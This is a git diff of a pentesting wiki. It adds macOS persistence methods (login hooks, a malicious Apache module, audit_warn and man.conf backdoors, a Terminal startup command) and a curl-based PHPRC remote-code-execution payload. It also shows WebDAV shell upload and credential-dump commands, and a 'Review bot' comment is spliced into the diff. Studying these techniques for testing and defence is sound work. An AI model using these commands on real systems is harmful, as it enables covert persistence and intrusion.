+ echo 'Execution directory inaccessible' >&2
+ exit 1
+}
+unset OLDPWD
+echo 11 > /tmp/at.txt
+```
+
+{% hint style="warning" %}
If AT tasks aren't enabled the created tasks won't be executed.
+{% endhint %}
+
+The **job files** can be found at `/private/var/at/jobs/`
+
+```
+sh-3.2# ls -l /private/var/at/jobs/
+total 32
+-rw-r--r-- 1 root wheel 6 Apr 27 00:46 .SEQ
+-rw------- 1 root wheel 0 Apr 26 23:17 .lockfile
+-r-------- 1 root wheel 803 Apr 27 00:46 a00019019bdcd2
+-rwx------ 1 root wheel 803 Apr 27 00:46 a0001a019bdcd2
+```
+
+The filename contains the queue, the job number, and the time it’s scheduled to run. For example let’s take a loot at `a0001a019bdcd2`.
+
+* `a` - this is the queue
+* `0001a` - job number in hex, `0x1a = 26`
+* `019bdcd2` - time in hex. It represents the minutes passed since epoch. `0x019bdcd2` is `26991826` in decimal. If we multiply it by 60 we get `1619509560`, which is `GMT: 2021. April 27., Tuesday 7:46:00`.
+
+If we print the job file, we find that it contains the same information we got using `at -c`.
### Login/Logout Hooks
+**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0022/](https://theevilbit.github.io/beyond/beyond\_0022/)
+
+#### Location
+
+* You need to be able to execute something like `defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh`
+
They are deprecated but can be used to execute commands when a user logs in.
```bash
@@ -165,6 +965,7 @@ echo 'My is: \`id\`' > /tmp/login_id.txt
EOF
chmod +x $HOME/hook.sh
defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh
+defaults write com.apple.loginwindow LogoutHook /Users/$USER/hook.sh
```
This setting is stored in `/Users/$USER/Library/Preferences/com.apple.loginwindow.plist`
@@ -173,6 +974,7 @@ This setting is stored in `/Users/$USER/Library/Preferences/com.apple.loginwindo
defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
{
LoginHook = "/Users/username/hook.sh";
+ LogoutHook = "/Users/username/hook.sh";
MiniBuddyLaunch = 0;
TALLogoutReason = "Shut Down";
TALLogoutSavesState = 0;
@@ -184,13 +986,128 @@ To delete it:
```bash
defaults delete com.apple.loginwindow LoginHook
+defaults delete com.apple.loginwindow LogoutHook
```
-In the previous example we have created and deleted a **LoginHook**, it's also possible to create a **LogoutHook**.
+The root user one is stored in **`/private/var/root/Library/Preferences/com.apple.loginwindow.plist`**
-The root user one is stored in `/private/var/root/Library/Preferences/com.apple.loginwindow.plist`
+{% hint style="danger" %}
+This didn't work for me, neither with the user LoginHook nor with the root LoginHook
+{% endhint %}
-### Applications Preferences
+### Apache2
+
+**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0023/](https://theevilbit.github.io/beyond/beyond\_0023/)
+
+#### Location
+
+* **`/etc/apache2/httpd.conf`**
+ * Root required
+ * Trigger: When Apache2 is started
+
+#### Description & Exploit
+
+You can indicate in /etc/apache2/httpd.conf to load a module adding a line such as:
+
+{% code overflow="wrap" %}
+```bash
+LoadModule my_custom_module /Users/Shared/example.dylib "My Signature Authority"
+```
+{% endcode %}
+
+This way your compiled moduled will be loaded by Apache. The only thing is that either you need to **sign it with a valid Apple certificate**, or you need to **add a new trusted certificate** in the system and **sign it** with it.
+
+Then, if needed , to make sure the server will be started you could execute:
+
+```bash
+sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist
+```
+
+Code example for the Dylb:
+
+```objectivec
+#include
+#include
+
+__attribute__((constructor))
+static void myconstructor(int argc, const char **argv)
+{
+ printf("[+] dylib constructor called from %s\n", argv[0]);
+ syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]);
+}
+```
+
+### Finder Sync Plugins
+
+**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0026/](https://theevilbit.github.io/beyond/beyond\_0026/)\
+**Writeup**: [https://objective-see.org/blog/blog\_0x11.html](https://objective-see.org/blog/blog\_0x11.html)
+
+#### Location
+
+* A specific app
+
+#### Description & Exploit
+
+An application example with a Finder Sync Extension [**can be found here**](https://github.com/D00MFist/InSync).
+
+Applications can have `Finder Sync Extensions`. This extension will go inside an application that will be executed. Moreover, for the extension to be able to execute its code it **must be signed** with some valid Apple developer certificate, it must be **sandboxed** (although relaxed exceptions could be added) and it must be registered with something like:
+
+```bash
+pluginkit -a /Applications/FindIt.app/Contents/PlugIns/FindItSync.appex
+pluginkit -e use -i com.example.InSync.InSync
+```
+
+### BSM audit framework
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0031/](https://theevilbit.github.io/beyond/beyond\_0031/)
+
+#### Location
+
+* **`/etc/security/audit_warn`**
+ * Root required
+ * **Trigger**: When auditd detects a warning
+
+#### Description & Exploit
+
+Whenever auditd detects a warning the script **`/etc/security/audit_warn`** is **executed**. So you could add your payload on it.
+
+```bash
+echo "touch /tmp/auditd_warn" >> /etc/security/audit_warn
+```
+
+You could force a warning with `sudo audit -n`.
+
+### Man.conf
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0030/](https://theevilbit.github.io/beyond/beyond\_0030/)
+
+#### Location
+
+* **`/private/etc/man.conf`**
+ * Root required
+ * **`/private/etc/man.conf`**: Whenever man is used
+
+#### Description & Exploit
+
+The config file **`/private/etc/man.conf`** indicate the binary/script to use when opening man documentation files. So the path to the executable could be modified so anytime the user uses man to read some docs a backdoor is executed.
+
+For example set in **`/private/etc/man.conf`**:
+
+```
+MANPAGER /tmp/view
+```
+
+And then create `/tmp/view` as:
+
+```bash
+#!/bin/zsh
+
+touch /tmp/manconf
+
+/usr/bin/less -s
+```
+
+### Terminal
In **`~/Library/Preferences`** are store the preferences of the user in the Applications. Some of these preferences can hold a configuration to **execute other applications/scripts**.
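Review bot: The two `#include` lines in the Apache2 dylib example (the `objectivec` block after "Code example for the Dylb:") have lost their header names, so the snippet does not compile as shown; the angle-bracketed headers were presumably stripped during rendering and should read `#include <stdio.h>` and `#include <syslog.h>`, which is what `printf`, `syslog` and `LOG_ERR` require. The prose around it has typos worth fixing in the same pass: "Dylb" → "Dylib", "compiled moduled" → "compiled module", "if needed ," → "if needed,". In the Man.conf "Location" list the second sub-bullet repeats the file path where the sibling sections (Apache2, BSM audit framework) give a trigger line; `* **Trigger**: Whenever man is used` would make it consistent. Since every new location in this hunk (`httpd.conf`, `audit_warn`, `man.conf`) is a root-owned config file, a one-line detection note per section — e.g. "Detection: file-integrity monitoring on this path; any write outside package/OS updates is suspicious" — would round out the entries for defenders.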
@@ -218,6 +1135,19 @@ This config is reflected in the file **`~/Library/Preferences/com.apple.Terminal
So, if the plist of the preferences of the terminal in the system could be overwritten, the the **`open`** functionality can be used to **open the terminal and that command will be executed**.
+You can add this from the cli with:
+
+{% code overflow="wrap" %}
+```bash
+# Add
+/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" 'touch /tmp/terminal-start-command'" $HOME/Library/Preferences/com.apple.Terminal.plist
+/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"RunCommandAsShell\" 0" $HOME/Library/Preferences/com.apple.Terminal.plist
+
+# Remove
+/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" ''" $HOME/Library/Preferences/com.apple.Terminal.plist
+```
+{% endcode %}
+
### Emond
Apple introduced a logging mechanism called **emond**. It appears it was never fully developed, and development may have been **abandoned** by Apple for other mechanisms, but it remains **available**.
diff --git a/macos-hardening/macos-red-teaming/README.md b/macos-hardening/macos-red-teaming/README.md
index 0f1a3c87c..2a7e3e5e9 100644
--- a/macos-hardening/macos-red-teaming/README.md
+++ b/macos-hardening/macos-red-teaming/README.md
@@ -53,7 +53,7 @@ Moreover, after finding proper credentials you could be able to brute-force othe
#### JAMF device Authentication
-
+
The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\
Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md
index 301ea5a50..aec494f71 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md
@@ -302,7 +302,7 @@ authenticate-session-owner, authenticate-session-owner-or-admin, authenticate-se
If you find the function: **`[HelperTool checkAuthorization:command:]`** it's probably the the process is using the previously mentioned schema for authorization:
-
+
Thisn, if this function is calling functions such as `AuthorizationCreateFromExternalForm`, `authorizationRightForCommand`, `AuthorizationCopyRights`, `AuhtorizationFree`, it's using [**EvenBetterAuthorizationSample**](https://github.com/brenwell/EvenBetterAuthorizationSample/blob/e1052a1855d3a5e56db71df5f04e790bfd4389c4/HelperTool/HelperTool.m#L101-L154).
@@ -314,7 +314,7 @@ Then, you need to find the protocol schema in order to be able to establish a co
The function **`shouldAcceptNewConnection`** indicates the protocol being exported:
-
+
In this case, we have the same as in EvenBetterAuthorizationSample, [**check this line**](https://github.com/brenwell/EvenBetterAuthorizationSample/blob/e1052a1855d3a5e56db71df5f04e790bfd4389c4/HelperTool/HelperTool.m#L94).
@@ -338,7 +338,7 @@ Lastly, we just need to know the **name of the exposed Mach Service** in order t
* In the **`[HelperTool init]`** where you can see the Mach Service being used:
-
+
* In the launchd plist:
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
index a6fcd53a7..bd7162715 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
@@ -22,7 +22,7 @@ Obviamente, esto es tan poderoso que es complicado cargar una extensión de kern
* Al entrar en **modo de recuperación**, las extensiones de kernel deben estar **permitidas para ser cargadas**:
-
+
* La extensión de kernel debe estar **firmada con un certificado de firma de código de kernel**, que solo puede ser otorgado por **Apple**. Quien revisará en detalle la **empresa** y las **razones** por las que se necesita.
* La extensión de kernel también debe estar **notarizada**, Apple podrá verificarla en busca de malware.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
index 5094416b3..71df34fbb 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
@@ -203,7 +203,7 @@ Example of **section header**:
If you **add** the **section offset** (0x37DC) + the **offset** where the **arch starts**, in this case `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC`
-
+
It's also possible to get **headers information** from the **command line** with:
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
index 8f94ae03e..a66440c19 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
@@ -21,7 +21,7 @@ It creates a 2 of names pipes per .Net process in [dbgtransportsession.cpp#L127]
So, if you go to the users **`$TMPDIR`** you will be able to find **debugging fifos** you could use to debug .Net applications:
-
+
The function [**DbgTransportSession::TransportWorker**](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L1259) will handle the communication from a debugger.
diff --git a/mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md b/mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md
index 723ba091e..9369937f1 100644
--- a/mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md
+++ b/mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -88,7 +88,7 @@ After installing Certificate SSL endpoints also working fine tested using → [h
After installing the certificate this way Firefox for Android won't use it (based on my tests), so use a different browser.
{% endhint %}
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md b/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
index d31752ac9..54d611e77 100644
--- a/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
+++ b/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
@@ -270,19 +270,19 @@ Explained in [**this video**](https://www.youtube.com/watch?v=qQicUW0svB8) you n
1. **Install a CA certificate**: Just **drag\&drop** the DER Burp certificate **changing the extension** to `.crt` in the mobile so it's stored in the Downloads folder and go to `Install a certificate` -> `CA certificate`
-
+
* Check that the certificate was correctly stored going to `Trusted credentials` -> `USER`
-
+
2. **Make it System trusted**: Download the Magisc module [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) (a .zip file), **drag\&drop it** in the phone, go to the **Magics app** in the phone to the **`Modules`** section, click on **`Install from storage`**, select the `.zip` module and once installed **reboot** the phone:
-
+
* After rebooting, go to `Trusted credentials` -> `SYSTEM` and check the Postswigger cert is there
-
+
## Nice AVD Options
diff --git a/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md b/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
index e24e82f87..c6e385d54 100644
--- a/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
+++ b/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -149,7 +149,7 @@ You can see that in [the next tutorial](frida-tutorial-2.md).
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/mobile-pentesting/ios-pentesting-checklist.md b/mobile-pentesting/ios-pentesting-checklist.md
index c17b17fd2..119032d83 100644
--- a/mobile-pentesting/ios-pentesting-checklist.md
+++ b/mobile-pentesting/ios-pentesting-checklist.md
@@ -1,6 +1,6 @@
# iOS Pentesting Checklist
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -120,7 +120,7 @@ Get Access Today:
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/mobile-pentesting/ios-pentesting/README.md b/mobile-pentesting/ios-pentesting/README.md
index 7831e2c19..6c4b6c78f 100644
--- a/mobile-pentesting/ios-pentesting/README.md
+++ b/mobile-pentesting/ios-pentesting/README.md
@@ -1,6 +1,6 @@
# iOS Pentesting
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -382,7 +382,7 @@ struct CGSize {
However, the best options to disassemble the binary are: [**Hopper**](https://www.hopperapp.com/download.html?) and [**IDA**](https://www.hex-rays.com/products/ida/support/download\_freeware/).
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -744,7 +744,7 @@ Jun 7 13:42:14 iPhone touch[9708] : MS:Notice: Injecting: (null) [touch
...
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -1233,7 +1233,7 @@ You can find the **libraries used by an application** by running **`otool`** aga
* [https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS)
* [https://github.com/nabla-c0d3/ssl-kill-switch2](https://github.com/nabla-c0d3/ssl-kill-switch2)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md b/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md
index 45cf8d210..9f0eac99e 100644
--- a/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md
+++ b/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -120,7 +120,7 @@ Steps to configure Burp as proxy:
* Click on _**Ok**_ and the in _**Apply**_
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/mobile-pentesting/xamarin-apps.md b/mobile-pentesting/xamarin-apps.md
index ce288351b..9659b0024 100644
--- a/mobile-pentesting/xamarin-apps.md
+++ b/mobile-pentesting/xamarin-apps.md
@@ -18,7 +18,7 @@ Xamarin is an open-source platform that gives developers access to a comprehensi
### Xamarin Android Architecture
-
+
Xamarin offers .NET bindings to Android.\* and Java.\* namespaces. Xamarin.
@@ -36,7 +36,7 @@ It runs along with the Objective-C Runtime. The runtime environments run on top
The below-given diagram depicts this architecture:
-
+
### What is .Net Runtime and Mono Framework?
@@ -70,7 +70,7 @@ If you encounter a Full AOT compiled application, and if the IL Assembly files a
Just **unzip the apk/ipa** file and copy all the files present under the assemblies directory:
-
+
In case of Android **APKs these dll files are compressed** and cannot be directly used for decompilation. Luckily there are tools out there that we can use to **uncompress these dll files** like [XamAsmUnZ](https://github.com/cihansol/XamAsmUnZ) and [xamarin-decompress](https://github.com/NickstaDB/xamarin-decompress).
@@ -88,7 +88,7 @@ In the case of the iOS, **dll files inside the IPA files can be directly loaded*
**Most of the application code can be found when we decompile the dll files.** Also note that Xamarin Framework based apps contain 90% of common code in the builds of all platforms like iOS and Android etc.
-
+
From the above screenshot of listing the dll files that were present in the apk, we can confirm that it is a Xamarin app. It contains app-specific dll files along with the library files that are required for the app to run, such as `Xamarin.Essentails.dll` or `Mono.Security.dll` .
diff --git a/network-services-pentesting/1099-pentesting-java-rmi.md b/network-services-pentesting/1099-pentesting-java-rmi.md
index 7672e0f0a..831d09ede 100644
--- a/network-services-pentesting/1099-pentesting-java-rmi.md
+++ b/network-services-pentesting/1099-pentesting-java-rmi.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -325,7 +325,7 @@ Entry_1:
Command: rmg enum {IP} {PORT}
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/network-services-pentesting/113-pentesting-ident.md b/network-services-pentesting/113-pentesting-ident.md
index 978f7acd1..2df7c382e 100644
--- a/network-services-pentesting/113-pentesting-ident.md
+++ b/network-services-pentesting/113-pentesting-ident.md
@@ -12,7 +12,7 @@
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
@@ -87,7 +87,7 @@ ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
identd.conf
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
diff --git a/network-services-pentesting/15672-pentesting-rabbitmq-management.md b/network-services-pentesting/15672-pentesting-rabbitmq-management.md
index 89f3c1482..1b872f86b 100644
--- a/network-services-pentesting/15672-pentesting-rabbitmq-management.md
+++ b/network-services-pentesting/15672-pentesting-rabbitmq-management.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -60,7 +60,7 @@ Content-Length: 267
* `port:15672 http`
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/network-services-pentesting/8086-pentesting-influxdb.md b/network-services-pentesting/8086-pentesting-influxdb.md
index 713e82167..4e1990610 100644
--- a/network-services-pentesting/8086-pentesting-influxdb.md
+++ b/network-services-pentesting/8086-pentesting-influxdb.md
@@ -1,6 +1,6 @@
# 8086 - Pentesting InfluxDB
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -153,7 +153,7 @@ msf6 > use auxiliary/scanner/http/influxdb_enum
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/network-services-pentesting/pentesting-postgresql.md b/network-services-pentesting/pentesting-postgresql.md
index 7df9516c7..5236c3379 100644
--- a/network-services-pentesting/pentesting-postgresql.md
+++ b/network-services-pentesting/pentesting-postgresql.md
@@ -1,6 +1,6 @@
# 5432,5433 - Pentesting Postgresql
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -681,7 +681,7 @@ The **password-based** authentication methods are **md5**, **crypt**, and **pass
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/network-services-pentesting/pentesting-ssh.md b/network-services-pentesting/pentesting-ssh.md
index 836120be3..0ff1e1ce0 100644
--- a/network-services-pentesting/pentesting-ssh.md
+++ b/network-services-pentesting/pentesting-ssh.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -313,7 +313,7 @@ id_rsa
* You can find interesting guides on how to harden SSH in [https://www.ssh-audit.com/hardening\_guides.html](https://www.ssh-audit.com/hardening\_guides.html)
* [https://community.turgensec.com/ssh-hacking-guide](https://community.turgensec.com/ssh-hacking-guide)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/network-services-pentesting/pentesting-web/jboss.md b/network-services-pentesting/pentesting-web/jboss.md
index 310ba8ca5..6e79ec29a 100644
--- a/network-services-pentesting/pentesting-web/jboss.md
+++ b/network-services-pentesting/pentesting-web/jboss.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -40,7 +40,7 @@ You can expose **management servlets** via the following paths within JBoss (dep
inurl:status EJInvokerServlet
```
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/network-services-pentesting/pentesting-web/moodle.md b/network-services-pentesting/pentesting-web/moodle.md
index 282d181b2..208b81760 100644
--- a/network-services-pentesting/pentesting-web/moodle.md
+++ b/network-services-pentesting/pentesting-web/moodle.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -120,7 +120,7 @@ find / -name "config.php" 2>/dev/null | grep "moodle/config.php"
/usr/local/bin/mysql -u --password= -e "use moodle; select email,username,password from mdl_user; exit"
```
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
index 58bb5e3eb..5272fd212 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
@@ -275,6 +275,12 @@ If you find a vulnerability that allows you to **modify env variables in PHP** (
2. Upload a second file, containing an **`auto_prepend_file`** directive instructing the PHP preprocessor to execute the file we uploaded in step 1
3. Set the `PHPRC` variable to the file we uploaded in step 2.
* Get more info on how to execute this chain [**from the original report**](https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/).
+* **PHPRC** - another option
+ * If you **cannot upload files**, you could use in FreeBSD the "file" `/dev/fd/0` which contains the **`stdin`**, being the **body** of the request sent to the `stdin`:
+ * `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'`
+ * Or to get RCE, enable **`allow_url_include`** and prepend a file with **base64 PHP code**:
+ * `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'`
+ * Technique [**from this report**](https://vulncheck.com/blog/juniper-cve-2023-36845).
## PHP Static analysis
diff --git a/network-services-pentesting/pentesting-web/put-method-webdav.md b/network-services-pentesting/pentesting-web/put-method-webdav.md
index 6b2129e7d..64cf83816 100644
--- a/network-services-pentesting/pentesting-web/put-method-webdav.md
+++ b/network-services-pentesting/pentesting-web/put-method-webdav.md
@@ -1,6 +1,6 @@
# WebDav
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -66,7 +66,7 @@ curl -T 'shell.txt' 'http://$ip'
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -132,7 +132,7 @@ wget --user --ask-password http://domain/path/to/webdav/ -O - -q
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/network-services-pentesting/pentesting-web/web-api-pentesting.md b/network-services-pentesting/pentesting-web/web-api-pentesting.md
index 8ad499068..0acd2b9a8 100644
--- a/network-services-pentesting/pentesting-web/web-api-pentesting.md
+++ b/network-services-pentesting/pentesting-web/web-api-pentesting.md
@@ -12,7 +12,7 @@
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
@@ -138,7 +138,7 @@ AutoRepeater Burp Extension: Add a replacement rule
* `Match: v2 (higher version)`
* `Replace: v1 (lower version)`
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -230,7 +230,7 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
* [**API-fuzzer**](https://github.com/Fuzzapi/API-fuzzer): API\_Fuzzer gem accepts a API request as input and returns vulnerabilities possible in the API.
* [**race-the-web**](https://github.com/TheHackerDev/race-the-web): Tests for race conditions in web applications by sending out a user-specified number of requests to a target URL (or URLs) _simultaneously_, and then compares the responses from the server for uniqueness.
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
diff --git a/network-services-pentesting/pentesting-web/wordpress.md b/network-services-pentesting/pentesting-web/wordpress.md
index cfa3a2d12..a69f09e58 100644
--- a/network-services-pentesting/pentesting-web/wordpress.md
+++ b/network-services-pentesting/pentesting-web/wordpress.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -101,7 +101,7 @@ curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-conten
curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
